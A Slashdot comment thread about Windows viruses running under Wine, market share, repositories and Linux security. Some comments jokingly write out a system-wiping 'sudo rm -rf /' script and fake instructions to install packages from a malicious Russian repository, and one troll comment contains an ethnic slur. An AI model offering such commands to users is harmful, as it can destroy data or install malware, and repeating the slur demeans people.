Now Linux Can Get Viruses, Via Wine

timothy posted more than 4 years ago | from the many-humans-do-the-same dept.

Security 343

fsufitch writes "Wine has advanced enough to make Linux not immune to Windows viruses. However, just like many Wine applications, it takes a bit of effort to get the program off the ground. Also, just like some Windows programs running via Wine, not all features may work — in this case, the crippling of the system, immunity to the task manager, identity theft, etc."

343 comments

marketshare (3, Insightful)

sopssa (1498795) | more than 4 years ago | (#29858417)

Hasn't it always been pretty clear that Wine could run Windows viruses, as long as they don't use some weird low-level tricks (which admittedly many do)?

But for that matter, Linux doesn't have malware only because its desktop share is next to nothing (not the same amount at least, there are Linux viruses out too). Mac OSX has been getting more and more viruses lately as its marketshare has been growing. So would Linux as well if it ever gained more users.

As long as the OS isn't completely locked down from the user, there will be malware. Windows, Mac, or Linux can't defend you from that. But none of us really want a locked down OS. And as long as the users are stupid their computers will get infected.

It's just about the marketshare.

Re:marketshare (3, Funny)

MadFarmAnimalz (460972) | more than 4 years ago | (#29858449)

Hasn't it always been pretty clear that Wine could run Microsoft Office, as long as they don't use some weird low-level tricks (which admittedly it does)?

But for that matter, Linux doesn't have MS Office only because its desktop share is next to nothing (not the same amount at least, there are Linux office suites out too). Mac OSX has been getting more and more office suites lately as its marketshare has been growing. So would Linux as well if it ever gained more users.

As long as the OS isn't completely locked down from the user, there will be office suites. Windows, Mac, or Linux can't defend you from that. But none of us really want a locked down OS. And as long as the users are stupid their computers will get infected.

It's just about the marketshare.

FTFY

Windows virus needs help to limp onto WINE (4, Insightful)

AliasMarlowe (1042386) | more than 4 years ago | (#29858719)

So WINE can get a virus intended for Windows, if you jump through some hoops to help the virus along. Color me unworried.

What can a Windows-targeted virus in WINE do to a Linux system, other than hang around looking impotent? Most of the target DLLs and other windows hidey-holes don't exist in WINE. Even if it finds a place to lurk, it's unlikely that it could hit the Linux system files or boot loader, or perform keylogging outside WINE or snoop on private files. A very crude "wipe drive C:" type virus might molest your WINE environment (your data files are elsewhere, of course), but that's about all. Even if the virus were specifically tailored for WINE on Linux, a successful attack would rely on user stupidity even more blatant than Windows viruses must depend on.

TFA even commented on how easy it is to dispose of the malware, even after spending some effort helping it to limp onto your system.

Re:Windows virus needs help to limp onto WINE (1)

GravityStar (1209738) | more than 4 years ago | (#29858879)

It might give virus developers ideas of creating neat, cool multiplatform mutating viruses.

Re:Windows virus needs help to limp onto WINE (-1, Troll)

Anonymous Coward | more than 4 years ago | (#29858929)

Filipina women will give you viruses like that. Their black syph will make your dick fall off. Don't marry Filipinas!

-- an ex-USN sailor

Re:marketshare (5, Insightful)

sakdoctor (1087155) | more than 4 years ago | (#29858455)

But none of us really want a locked down OS

WTF?
Microsoft totally fucked up the principle of least privilege from day one. If they hadn't, the damage done by viruses/worms in the history of personal computing would have been an order of magnitude less.

Re:marketshare (5, Insightful)

bhtooefr (649901) | more than 4 years ago | (#29858923)

The problem is, for a home computer, you are your own sysadmin.

And then the dancing bunnies problem comes into play.

User: "Oooh, I can download this to see dancing bunnies." *downloads and executes malware*
Malware: *tries to install*
OS: "Malware needs root access to install. Please enter your root password." (Windows version of this would be "Cancel or Allow.")
User: *enters root password*
Malware: *infects system*
OS: *pwned*
User: *pwned*

Re:marketshare (0)

sopssa (1498795) | more than 4 years ago | (#29859129)

And even more so, malware doesn't even need administrator access in the majority of cases. Keylogging, sending spam and so on work just fine without admin too (and so it would on Linux as well).

Re:marketshare (4, Funny)

Nerdfest (867930) | more than 4 years ago | (#29859253)

Yeah ... but dancing bunnies .... it is a tough call.

Linux's distribution model helps though (5, Insightful)

brunes69 (86786) | more than 4 years ago | (#29858475)

The way Linux software is distributed makes it much less likely to get a virus. You know how many applications I have downloaded from random websites in the past 2 years for my Linux system? Maybe 2. All of the rest are in the centrally managed, (hopefully) certified virus-free application repository, which is free for all.

The idea that a Linux user would download random stuff from a torrent or website is a pretty foreign concept. For me, and most others, if it isn't in the repository, I don't bother - because there is probably something in the repository that suits my needs just as well or better anyway.

Re:Linux's distribution model helps though (1, Interesting)

Anonymous Coward | more than 4 years ago | (#29858665)

certified quite literally the repositories for most distros use package signing of some sort, so even mirrors of them are guaranteed to be unaltered.

Re:Linux's distribution model helps though (1)

cenc (1310167) | more than 4 years ago | (#29859009)

That is a big big difference in the MS software culture vs. linux or just open source in general. Software is signed, and from day one users are bombarded with notices about the package signing and instructions on how to use them. Until I started using open source, I don't remember ever once being told to checksum windows software before installing.

I have even on occasion grabbed torrents of distros from relatively shady torrent sites because they had more seeds or whatever closer to my home, unconcerned about the final download because I had the signature from a trusted source to check once it was down to ensure it was for real. The simple checking culture makes malware infiltration difficult (although not impossible) into open source software.

Re:Linux's distribution model helps though (1)

lukas84 (912874) | more than 4 years ago | (#29859215)

Then you're quite new to the Linux game.

Debian didn't sign anything for a long, long time. Or Slackware. Or Gentoo. Of course this has all been fixed by now, but Linux sure wasn't what started the whole "sign everything" trend.

While Windows has been displaying a lot of warnings with missing Authenticode signatures starting with Windows XP.

Re:Linux's distribution model helps though (1)

cenc (1310167) | more than 4 years ago | (#29859351)

I have never been a Debian user, but I have been using open source software for better than 10 years and I recall back then everything I was running being signed, at least in Red Hat / rpm circles. I believe most things were signed because there was always the possibility of a download being corrupted from a flaky Internet connection, more than security concerns.

Re:marketshare (3, Insightful)

wizardforce (1005805) | more than 4 years ago | (#29858495)

So what you're saying is that Linux should be just riddled with various types of malware in the server market because it is both the dominant player in that market and is a significant target considering the server market's importance. Reality seems to disagree with you.

Re:marketshare (5, Insightful)

Anonymous Coward | more than 4 years ago | (#29858611)

To be fair, there's a significant effort to install backdoors/trojans on poorly configured linux machines, but the issue is that they're a much more difficult target as servers do not browse websites with IE nor do they open every attachment you send them via email.

What makes most machines insecure is the users, and since a server normally has only 1 very tech-savvy user, the only openings are in poorly configured services. I know that I had phpbb for a long time, and one day I put in a game playing mod (had some goofy things like achievements and little trophies), and I got hacked via a google search.

Fortunately the guy who installed it didn't finish off his attack by clearing his own history, and the server wasn't running as root, so he only got as far as screwing with the main page.

To say that the server market isn't continually targeted is disingenuous. It's just harder because it isn't operated by a ton of idiots (well, most of the time anyway).

Re:marketshare (1, Funny)

Anonymous Coward | more than 4 years ago | (#29859385)

I should clarify that "hacked by a google search" is in reference to the fact that he used google to find the vulnerable service on my server, then proceeded to actually attack me using said vulnerability.

Sorry, I just realized how silly that sounded...

Re:marketshare (1)

0ld_d0g (923931) | more than 4 years ago | (#29859225)

Server admins are 10 orders of magnitude more paranoid about security than the average Windows user who clicks on random ads and gets infected. Which BTW, Servers are never used for. (casually browsing the net)

Re:marketshare (1, Interesting)

Anonymous Coward | more than 4 years ago | (#29858625)

But for that matter, Linux doesn't have malware only because its desktop share is next to nothing

Then why do linux servers not have viruses? Windows servers do, and Linux has a much bigger market share.

Re:marketshare (2, Insightful)

shentino (1139071) | more than 4 years ago | (#29859057)

Windows, however, is bigger overall.

And you don't really need a beefy server in your botnet. A desktop will do just fine.

Re:marketshare (3, Insightful)

0100010001010011 (652467) | more than 4 years ago | (#29858755)

A link to all those hundreds of OS X viruses that are coming out?

Re:marketshare (2, Insightful)

wintersdark (1635191) | more than 4 years ago | (#29858839)

Thinking that you're safe running OSX is very foolish. It IS more secure than Windows, but it can get viruses too. As OSX increases in market share, you will find more viruses appearing for it too. It'll take a little longer to get started - Everyone got great Intro Virus Production 101 classes in grossly insecure older versions of Windows, after all. OS X is indeed a more secure operating system, but it is not an invincible one. Assuming you are and will always be safe because you're running it is a very bad idea.

Re:marketshare (1)

aitikin (909209) | more than 4 years ago | (#29859007)

Yes, but until a virus comes out for it (which they haven't yet, with the possible exception of proof of concepts) and when it does, everyone will know immediately cause news of it'll be all over the place.

Re:marketshare (2, Informative)

lukas84 (912874) | more than 4 years ago | (#29859227)

Infected copies of Apple's iWork are already floating around.

http://gizmodo.com/5139116/os-x-iwork-trojan-revamped-repackaged-rereleased-in-photoshop [gizmodo.com]

Re:marketshare (1)

ctmurray (1475885) | more than 4 years ago | (#29859319)

So you get a virus from a pirated copy of iWorks. (and Photoshop). And you have to give the program root access. Hmm....

Re:marketshare (1)

lukas84 (912874) | more than 4 years ago | (#29859357)

How's that different from the usual infection vectors on Windows?

User downloads program from shady site. Executes it and agrees to the UAC prompt. Bam. All done.

Re:marketshare (0)

Anonymous Coward | more than 4 years ago | (#29859255)

You mean once it's discovered.....

Re:marketshare (2, Interesting)

Stupendoussteve (891822) | more than 4 years ago | (#29859403)

OS X Snow Leopard notices the two trojans which are in the wild.

They didn't do anything extreme, and they were installed by stupid users pirating software, but they do exist.

Re:marketshare (5, Funny)

zmollusc (763634) | more than 4 years ago | (#29859013)

If I was teh evil malwares writer, I would target OSX as its users have piles of cash. The trick would be to make your pop-up so beautifully coloured, shaded, animated and raytraced that the style-obsessed mac user would fill in his credit card details immediately.

Re:marketshare (1)

Stupendoussteve (891822) | more than 4 years ago | (#29859381)

It is foolish.

Just as foolish as thinking you're automatically safe running Linux, though admittedly repositories remove a lot of the danger. OS X and Linux generally do not suffer from the second-you-get-online worms that Windows has been known for, but they are not immune to malware if the user is uneducated or unconcerned. This will always be the best attack vector.

Re:marketshare (1)

sopssa (1498795) | more than 4 years ago | (#29859181)

Google query [google.com]

Re:marketshare (1)

0100010001010011 (652467) | more than 4 years ago | (#29859309)

That looks like Malware. Stuff that people install voluntarily because of social engineering.

I could put:
-
#!/bin/bash
sudo rm -rf /
-
into a file and tell you that it'll give you more free hard drive space.

I'm talking about Viruses & Trojans. The stuff that is automated and requires 0 user interaction. The stuff that infects an XP SP1 machine within 20 minutes of being on the internet. [securityfocus.com]

Re:marketshare (1)

sopssa (1498795) | more than 4 years ago | (#29859345)

Nowadays you don't really get automated viruses on Windows either, I haven't got any since something like Windows 98. Most automated infections usually come from websites exploiting Flash or PDF too, and that's not really Windows' fault.

(* excluding whatever it was that Conficker was exploiting a year ago, but that too was patched many months before)

Re:marketshare (2, Informative)

cheftw (996831) | more than 4 years ago | (#29859415)

That looks like Malware. Stuff that people install voluntarily because of social engineering.

I could put:
-
#!/bin/bash
sudo rm -rf /
-

I remember reading that it's better practice to write that

sudo rm / -rf

since putting your switches at the end (especially on rm) makes it easier to catch stupid mistakes (like hitting return early).

Not that in your case it's a huge deal.

Re:marketshare (1, Offtopic)

Storchei (723338) | more than 4 years ago | (#29858773)

Hasn't it always been pretty clear that Wine could run Windows viruses, as long as they don't use some weird low-level tricks (which admittedly many do)?

But for that matter, Linux doesn't have malware only because its desktop share is next to nothing (not the same amount at least, there are Linux viruses out too). Mac OSX has been getting more and more viruses lately as its marketshare has been growing. So would Linux as well if it ever gained more users.

As long as the OS isn't completely locked down from the user, there will be malware. Windows, Mac, or Linux can't defend you from that. But none of us really want a locked down OS. And as long as the users are stupid their computers will get infected.

It's just about the marketshare.

I think you simply did not get the idea of open source. Of course there can be viruses for Linux and open source OSs, but what is the probability they survive? Why? Because of the very core of open source success, EVERYONE who wants can take a look at the code and improve it. Beyond that, who will create a virus for a soft built by her/himself?? I think as Linux/open source OSs gain market they are more exposed, but their essence makes them more reliable and protected from malicious code. Of course they are not perfect, but they are by far more efficient/reliable than commercial OSs. I think the skills of a person who intends to write a virus for linux/open source OSs should be BY FAR higher than the skills of a person who intends to write a virus for Windows/Mac, just because linux/open source code is constantly reviewed by millions of people, thus the virus writer must be cleverer than those millions to find a hole nobody else did. In summary, I find linux/open source OSs BY FAR more reliable than windows/commercial OSs. There is no perfect OS, there is a suitable one instead. I think if people take care of the software they use, among other things, the possibilities of getting a virus are minimum. Regards!

Parallels Virtual Machine (1)

reporter (666905) | more than 4 years ago | (#29858775)

The issue of viruses infecting Linux from a Windows program running via Wine is really a non-issue. Nowadays, you can spend a small amount of money and buy a Parallels application that emulates a real Windows machine. This virtual machine is fully isolated from the rest of the Linux system.

I use Parallels Desktop 4.0. It works great on my MacBook Pro. I can run almost any Windows program. The downside is that, of course, the Windows virtual machine is slower than a real Windows box. However, what is important to me is that Windows viruses are trapped inside the virtual machine.

I like to say, "The Power of Mac. The Utility of Windows. Thanks to Parallels." No. I don't work for Parallels, but I love this product.

Re:Parallels Virtual Machine (0)

Anonymous Coward | more than 4 years ago | (#29859353)

Emulators have existed since I was born. "nowadays"?
Also, "spend money"? Clearly a Mac user.

Re:Parallels Virtual Machine (2, Informative)

cheftw (996831) | more than 4 years ago | (#29859449)

You presume that it is impossible to break out of a virtualised environment.

A quick google will turn up papers which may diminish your naivety.

Also IMHO the way to go is VirtualBox (FOSS and made by Soracle).

not just marketshare (4, Interesting)

RiotingPacifist (1228016) | more than 4 years ago | (#29858799)

Ubuntu 9.10 will start sandboxing desktop programs (starts with xpdf I think), other distros do already/will follow. I think that sandboxing can (and if required will) cripple malware's abilities (e.g. can't listen on network ports, can't insert itself into the boot sequence, can't touch chrome tabs that are connected to https sites), leaving them unable to do most malwarey things without permission, and can work like an AV that is designed right (e.g. warn users that they are about to do something very stupid, only when they are, not every time they run a 3rd party app/widget, without having to scan binaries)

Re:not just marketshare (3, Insightful)

lukas84 (912874) | more than 4 years ago | (#29859239)

You mean just like Internet Explorer has been doing since the End of 2006?

Re:not just marketshare (0)

Anonymous Coward | more than 4 years ago | (#29859435)

I assume you're referring to the dialog that says "Internet Explorer is not your default browser. Do you want to compromise your system by making it your default browser now?"

Re:marketshare (0)

Anonymous Coward | more than 4 years ago | (#29858865)

Hasn't it always been pretty clear that Wine could run Windows viruses, as long as they don't use some weird low-level tricks (which admittedly many do)?

But for that matter, Linux doesn't have malware only because its desktop share is next to nothing (not the same amount at least, there are Linux viruses out too). Mac OSX has been getting more and more viruses lately as its marketshare has been growing. So would Linux as well if it ever gained more users.

As long as the OS isn't completely locked down from the user, there will be malware. Windows, Mac, or Linux can't defend you from that. But none of us really want a locked down OS. And as long as the users are stupid their computers will get infected.

It's just about the marketshare.

If it's all down to marketshare (and I'm not saying that isn't a factor), then why is it that there are large numbers of Linux servers, yet only a very small number of exploits? Also, it might be being picky, but where is the evidence that MacOSX has been getting more and more viruses? Agree with you that the weakest link is and always will be the user, but that's not the entire story.

Re:marketshare (2, Interesting)

cenc (1310167) | more than 4 years ago | (#29859149)

I have been running linux machines for going on 10 years now, including my home, all the computers in my office, dozens of servers with every imaginable piece of software and configuration possible (some secure, some insecure). In that time, I have yet to ever find one virus, malware, or evidence that a serious attempt ever made any progress.

The market share argument just does not cut it. You would think there would be at least one well known case in the wild by now of a linux virus spreading to other linux machines in a sustained and ongoing manner.

The best we have are 'just so' cases. The software, permissions, user, network, and so on had to be just so in order for virus or malware to work. But a general widespread linux virus? Where are they?

Re:marketshare (1)

amilo100 (1345883) | more than 4 years ago | (#29859317)

You would think there would be at least one well known case in the wild by now of a linux virus spreading to other linux machines in a sustained and ongoing manner.

Have you ever thought about how viruses spread? A lot of Windows users get viruses or adware by downloading a program from a website (e.g. P2P programs, games, etc...). Most Linux users get their software via official repositories - which removes that method in which viruses spread. When did you last download a Cracked Copy of a Linux game or software package?

Re:marketshare (1)

hcmtnbiker (925661) | more than 4 years ago | (#29859327)

The market share argument just does not cut it. You would think there would be at least one well known case in the wild by now of a linux virus spreading to other linux machines in a sustained and ongoing manner.

What? That's exactly why market-share is so important. You're assuming they can find other linux machines. And how would they do this? How would it discover other machines? This is hard enough to do with a windows host, let alone one that has ~1/100 the market-share.

Re:marketshare (1)

cenc (1310167) | more than 4 years ago | (#29859371)

That would be fairly easy to determine. I just need to have a look at my web site server logs to see all the information about my visitors' OS, the version, and so on, not to mention you have about a 60% chance of any given server being linux.

Re:marketshare (2, Interesting)

dontmakemethink (1186169) | more than 4 years ago | (#29859339)

Think of it from the perspective of the imps making the viruses (and no, it's not 'virii'). Pretend you're a spineless asshole that wants to cause as much damage as possible. Do you use widespread tools to make a Windows virus with relative ease and hit the biggest user base, or do you spend much more time finding vulnerabilities in better OS's and hit a much smaller user base?

99 times out of 100 it's the former scenario that plays out. Doesn't mean you needn't run anti-virus software on OS X, for example, but you can have much more confidence that nothing will get past it. Running XP doesn't scare me, it's the number of viruses that Avast catches that scares me.

Re:marketshare (2, Interesting)

zigmeister (1281432) | more than 4 years ago | (#29859377)

I mostly agree. However Linux (and Mac) are much more immune to what are strictly viruses. What they are not much more immune to are trojans*, which I think constitute ~80-90% of infected Windows desktops. Here's my theory to dispel the myth of how robust Linux is (when in the hands of a typical user): Write a malware program that is a variant on the dancing bunnies. Put it up for download. User must have dancing bunnies or else. User clicks to download, then selects Open with Package Manager. User enters root password to install then, since security signature is missing, must enter it again. Malware program now installed.

*I'm aware of least privilege. However with more and more of the total desktop market being in the home, most users will have their root passwords (i.e. not in a corporate environment) and see no difference between entering that and clicking continue on a bunch of UAC prompts. To make matters worse they will be conditioned to "Force install" since a decent amount of apps that are safe that they want don't provide security signatures either. E.G.: World of Goo, Hulu Desktop Client, commercial games if they ever come etc.

Re:marketshare (0)

Anonymous Coward | more than 4 years ago | (#29859393)

Macs don't have viruses, they have Trojans which are something completely different. A virus exploits a hole in the operating system, a trojan exploits the person sitting in front of the computer. If you install a "video codec", there's no way (without an anti-virus program) for the computer to know that it's bad.

It's like a what? (3, Interesting)

cjfs (1253208) | more than 4 years ago | (#29858471)

A virus run in Wine is akin to taking a ferocious tiger out of the jungle, paralyzing it, then hooking up all of its nerve endings to virtual jungle simulator. It's not a perfect simulation, though, so the jungle maybe doesn't look right, and plus there's an omnipotent power that can change anything that goes on in the simulation, or even destroy it and the tiger's consciousness with a few twitches of his fingers. Now that's power.

Power that's generated by feeding the dead tigers back to other tigers so we can use their body heat to generate MORE POWER!

On second thought, let's stick to car analogies.

feeding the dead tigers back to other tigers (1)

snikulin (889460) | more than 4 years ago | (#29858843)

Felinae spongiform encephalopathy!

Just waiting for this e-mail (4, Funny)

fluch (126140) | more than 4 years ago | (#29858497)

This is a lonesome linux virus. Please add

deb http://malware.server.ru/debian [server.ru] experimental non-free

to your /etc/apt/sources.list and execute "apt-get my-first-virus" as root. Thank you very much for your cooperation.

Re:Just waiting for this e-mail (4, Funny)

sakdoctor (1087155) | more than 4 years ago | (#29858519)

non-free?

I only install FLOSS malware.

Re:Just waiting for this e-mail (4, Funny)

Anonymous Coward | more than 4 years ago | (#29858563)

Me too, I won't compromise my freedom just to be part of a botnet.

Free alternative: http://www.gnu.org/fun/jokes/evilmalware.html

Re:Just waiting for this e-mail (2, Funny)

ozamosi (615254) | more than 4 years ago | (#29858857)

This is a lonesome linux virus. Please add

deb http://malware.server.ru/debian [server.ru] experimental non-free

to your /etc/apt/sources.list and execute "apt-get my-first-virus" as root. Thank you very much for your cooperation.

Yeah, I run Fedora...

Re:Just waiting for this e-mail (1)

wizardforce (1005805) | more than 4 years ago | (#29858979)

Yeah, I run Fedora...

wget http://malware.server.ru/debian.deb [server.ru]

sudo alien -r debian.deb

Re:Just waiting for this e-mail (0)

Anonymous Coward | more than 4 years ago | (#29859281)

fedora doesn't have alien, you insensitive clod!

Linux on a bender (5, Funny)

Anonymous Coward | more than 4 years ago | (#29858505)

What do you expect when Linux gets drunk on Wine and wakes up with Windows it's bound to have caught something.

Precautions I take (0)

Anonymous Coward | more than 4 years ago | (#29858521)

I have a user called wine-o that I only use to run wine, and alias wine='echo switch to wine-o' in the account I usually use.

I wish I had used a username other than wine-o because I don't think it looks that good when I send resumes out last saved by 'wine-o'.

Hooray! (1, Funny)

Greyfox (87712) | more than 4 years ago | (#29858529)

It's like I used to not be able to get herpes, AIDS or the flu and NOW I CAN! Thanks, wine team!

That's the problem with Wine... (4, Funny)

Interoperable (1651953) | more than 4 years ago | (#29858533)

I always have to configure the programs so much before they run. It really defeats the purpose of a virus if I have to configure it so much first. Once Linux can run Windows viruses with a one-very-poorly-chosen-click install process I might make the switch. Besides, I can just run my FOSS software under Windows and still have access to all of the proprietary viruses that are only made for windows.

Executables under wine (1)

Psicopatico (1005433) | more than 4 years ago | (#29858561)

Didn't read TFA yet (already slashdotted?), but I think I've encountered one working "unwanted program" under Wine lately.

If I recall correctly, the vector was the setup or the program itself for a peer to peer TV system, which I wanted to try under wine.

Once launched, some unwanted processes kept popping out, and the command reported by ps was stuff like "wine C:\WINDOWS\TEMP\asasaazasdax.exe" or similar.
Suspect at first look.

Actually I don't remember which one between "killall wine" or "kill -KILL " solved the issue.

Re:Executables under wine (1)

TheRaven64 (641858) | more than 4 years ago | (#29858805)

It's not entirely surprising. You can protect yourself against Windows-designed malware by restricting the filesystem that WINE has access to, but that doesn't protect you against malware that is intended to be cross-platform. Once a program has used WINE as a loader, it can still issue Linux system calls directly (WINE can't catch system calls, only library calls) and break out of the WINE sandbox.

Linux? (2, Interesting)

niko9 (315647) | more than 4 years ago | (#29858573)

Preface: I'm Debian GNU/Linux user of 10 years, but not a professional computer geek. I use GNU/Linux to get work done.

I thought Linux was just a kernel? Should not the headline read "A Linux distribution that has Wine installed *might* be vulnerable to Windows viruses?"

Re:Linux? (-1, Flamebait)

Anonymous Coward | more than 4 years ago | (#29858709)

Shut up, you pedantic faggot.

Re:Linux? (-1, Flamebait)

Ant P. (974313) | more than 4 years ago | (#29858903)

Mod parent AC up.

"...not all features may work - ..." (0)

Anonymous Coward | more than 4 years ago | (#29858589)

"...in this case, the crippling of the system, immunity to the task manager, identity theft, etc."

Yes, identity theft was always a great feature, just like immunity to the task manager. What the h**l does that even mean? Geez.

Also: I hereby tag this: HAHAHAHA

Look to Apple users using VM (4, Interesting)

Ilgaz (86384) | more than 4 years ago | (#29858597)

If you look deeper at Apple users' virtual machines (Sun Virtual Box etc.), lots of them don't bother to install some free AV, a basic one, saying "it is virtual anyway". When you talk about how evil things can be done while their virtual machine is up and what kind of trouble they may get into if they have bad luck, they install a free AV to Windows.

If you have trouble convincing such people, just use plain logic: It can even run some games let alone a worm/trojan/virus.

It is not in the culture you know...

The only place... (1)

digitalderbs (718388) | more than 4 years ago | (#29858629)

...you should be able to get a virus from wine is at church.

Re:The only place... (1)

corbettw (214229) | more than 4 years ago | (#29858957)

All right Father, think it's time for you to leave the altar boys alone.

Experiments (4, Informative)

Aquaseafoam (1271478) | more than 4 years ago | (#29858647)

I work as a sysadmin at a company making a slow switchover to Linux, and I've experimented with this a bit. You can greatly, greatly limit the damage any virus can cause through wine by unmapping its Z drive from the wine configuration menu. By default, wine maps / to Z. I can see why they did this (wine can only run applications within a mapped drive), but it likely needs to be undone across the board. The best alternative would be to create an unhidden wine folder in the user's home directory and map that in wine. If Z is left mapped to /, then a windows virus can run rampant all throughout your system.
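The drive-mapping check described in the comment above, as an added example that is not part of the original thread. It assumes the standard Wine prefix layout, where each drive letter is a symlink under `dosdevices`; the function names are this example's own, and the sample prefix is constructed.

```shell
#!/bin/sh
# Added example (not from the thread): audit the drive letters of a Wine prefix.
# Assumes the standard layout: each drive is a symlink in PREFIX/dosdevices.

# Print "LETTER TARGET VERDICT" per drive; return 1 if / or $HOME is reachable.
audit_wine_drives() {
    prefix=${1:-${WINEPREFIX:-$HOME/.wine}}
    [ -d "$prefix/dosdevices" ] || { echo "no dosdevices in $prefix" >&2; return 2; }
    prefix_real=$(cd "$prefix" && pwd -P)
    home_real=$(cd "${HOME:-/}" 2>/dev/null && pwd -P) || home_real=
    exposed=0
    for link in "$prefix"/dosdevices/?:; do
        [ -L "$link" ] || continue          # unmatched glob or not a symlink
        letter=${link##*/}
        if target=$(cd "$link" 2>/dev/null && pwd -P); then
            case "$target" in
                /)                verdict=EXPOSES-ROOT; exposed=1 ;;
                "$prefix_real"/*) verdict=inside-prefix ;;
                *)  # is the target $HOME itself or one of its parents?
                    case "$home_real/" in
                        "$target"/*) verdict=EXPOSES-HOME; exposed=1 ;;
                        *)           verdict=outside-prefix ;;
                    esac ;;
            esac
        else
            target=-; verdict=unresolved    # dangling link or not a directory
        fi
        printf '%s %s %s\n' "$letter" "$target" "$verdict"
    done
    return "$exposed"
}

# Remove one mapping (e.g. z:); only the symlink is deleted, never its target.
unmap_wine_drive() {
    link="${1:?prefix}/dosdevices/${2:?drive letter, e.g. z:}"
    [ -L "$link" ] || { echo "$link is not a drive symlink" >&2; return 1; }
    rm -- "$link"
}

# Constructed sample prefix with the default mapping described above (z: -> /).
make_sample_prefix() {
    p=$(mktemp -d) && mkdir -p "$p/drive_c" "$p/dosdevices" &&
        ln -s ../drive_c "$p/dosdevices/c:" && ln -s / "$p/dosdevices/z:" &&
        echo "$p"
}
```

Removing a mapping only narrows what Windows-style paths can reach: the process still runs with the user's permissions, and Wine does not intercept direct Linux system calls.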

Re:Experiments (1)

ElKry (1544795) | more than 4 years ago | (#29858713)

If Z is left mapped to /, then a windows virus can run rampant all throughout your system.

... with your current user's permissions. Which I grant you is bad enough.

Re:Experiments (1)

jedidiah (1196) | more than 4 years ago | (#29859161)

The main problem is still "running amok" in /home. / won't get you much.

Mac Office was a bigger headache for me (2, Interesting)

Savior_on_a_Stick (971781) | more than 4 years ago | (#29858721)

Users with Office installed seem to end up with documents infected with a macro virus.

While the Macs are themselves unaffected, they pass along the infection to windows boxes.

That's usually the point where they are found and removed, but the general lack of av for Mac (few choices and most lack functionality/accuracy) along with the perception of macs as immune means that av is rarely installed on macs.

When it is, AV_App_X doesn't detect the malware, whereas AV_App_Y detects, but can't clean, and AV_App_Z has no realtime scanning.

Re:Mac Office was a bigger headache for me (1)

Totenglocke (1291680) | more than 4 years ago | (#29858875)

While the Macs are themselves unaffected, they pass along the infection to windows boxes. That's usually the point where they are found and removed, but the general lack of av for Mac (few choices and most lack functionality/accuracy) along with the perception of macs as immune means that av is rarely installed on macs.

Quite true. However, Symantec Endpoint Protection now supports OS X as well, so there's at least a decent (for business use, I'd never touch Symantec for personal use) AV program for Mac now. The hard part will be explaining to people why they need it.

I had a user the other day when I went to work on his machine who had removed AV - I mentioned the lack of AV and he goes "Well it's just on a separate workgroup, it's not on the domain". Well that separate workgroup still had internet access (even though technically it wasn't supposed to), which he knew quite well from all the IM clients and browsing he'd done on that machine. After I installed AV on it I ran a scan and, surprise!, it had a dozen viruses. I'm actually surprised it wasn't more than that.... But yes, some people just aren't smart enough to realize that you need AV protection.

Re:Mac Office was a bigger headache for me (1)

mevets (322601) | more than 4 years ago | (#29859361)

The analogy between computer virus and human virus breaks down at responsibility. MS software is incredibly susceptible to viruses (viri?) because of clear business decisions they made. Market domination is a secondary effect; opportunity plays a huge role in this.

Anecdote: after a friend's car was stolen with his keys, he asked the police officer if he should change the locks on his house. The officer replied "Not to worry, if they were that ambitious, they would have a job".

They must have known what they unleashed, to be generous, 12 years ago. They chose to do it anyways, probably using the Ford Pinto (4 wheel toaster) business model.

If MS wants the few of us who don't use their software to insulate their systems, they should at least bribe us. $50/year and an open source virus scanner would be fine. I shouldn't have to join the norton/symantec/... protection racket simply because I might forward a "funny video" to some poor shmuck who has to use Windows.

Just get hacked, it is easier anyway (1, Insightful)

Anonymous Coward | more than 4 years ago | (#29858767)

In 1996, my Linux box was hacked in under 20 minutes of being online. The root account password was changed and my account was deleted (along with all my files). I reinstalled and learned about securing unix.

In 1998 my Linux box was hacked due to a 3 month behind-patch version of bind. They dropped a perl script into /tmp and tried to gain root with a perl timing-to-root bug, which had already been patched on my system. A disconnected backup was used to validate all the files on the system and proved that only the named userid and /tmp/.sdfsdfs directory had been touched.

I don't run bind on an internet accessible machine anymore.

I haven't been hacked since, but I'm not so ignorant to believe that I can't be hacked. My plans for when I'm hacked revolve around discovering the cause and restoring from a complete system backup, then removing the vulnerability. I expect to be hacked, period. "I" is really "we" since I run servers for my company and for other companies.

Neither hack was a virus, but they were just as bad and could have been much worse.

Linux isn't THAT more secure, it is just less targeted since Windows is 90%+ of the computers. Stop being so smug folks.

I think Apple is about to learn a real lesson with the iPhone being hacked constantly. Then Linux will be targeted.

Re:Just get hacked, it is easier anyway (4, Insightful)

argent (18001) | more than 4 years ago | (#29859051)

Linux isn't THAT more secure, it is just less targeted since Windows is 90%+ of the computers.

A properly configured UNIX client system is significantly more secure than any comparable Windows system, even if you don't run a firewall. There are two significant differences: Internet Explorer, and Services.

The security model of IE is inherently flawed and can not be fixed without breaking existing applications. Microsoft is unwilling to take that step.

Windows services are neither run from a superserver nor in virtually all cases do they allow binding to specific ports, and Windows networking (LAN Manager) requires having services with open ports.

These are fairly significant problems that can not be addressed without changes to Windows APIs that are unlikely to happen.

I think Apple is about to learn a real lesson with the iPhone being hacked constantly.

If someone has physical access to the system, all the software security in the world is useless. The iPhone is being attacked by the device's *owners*. These are *local exploits*, much more common and of much less concern than remote ones.

Re:Just get hacked, it is easier anyway (1)

jedidiah (1196) | more than 4 years ago | (#29859249)

> Linux isn't THAT more secure, it is just less targeted since Windows is 90%+ of the computers. Stop being so smug folks.

You're on f*cking crack. You're talking about BIND of all things. What does a normal user need with BIND?

Of course BIND is one of the most notorious Unix services out there. It and sendmail have a long history of problems.

Even in 1998, it was known as a STUPID thing to do.

The thing with Unix (and MacOS) is that once a stupid thing is exposed, companies, distributors and end users tend to stop doing it. It doesn't fester like a boil until it turns into some sort of life threatening infection.

Also, the problems with BIND or sendmail or even PHP are application problems that can impact any Unix or any other OS that runs those applications. Since none of them are subject to any sort of "monopoly coercion" it's rather trivial to get rid of them and possibly run an alternative if need be.

What do you run if msoffice is a wormfest?

It's 2009 and Windows users are still being infested with IE malware. Just avoiding IE by itself can go a very long way in helping n00bs keep their Windows boxes intact.

The smugness is entirely warranted.

When running Windows, it has always been best to minimize your use of Windows products. This was true with Windows 3.1 and it's still true today. Microsoft remains worse than anyone else in the industry (including Apple).

To be pedantic .. (1)

NoYob (1630681) | more than 4 years ago | (#29858785)

Linux doesn't have malware...

Yes it does: it's just very very rare.

A friend of mine bought a domain and within hours of getting it and starting it, someone put a rootkit on that damn thing before he could lock it down - yes, it was a Linux server hosting his domain. Yes, it's not malware per se as you would from surfing the web, but we shouldn't get complacent about Linux' absence of threats.

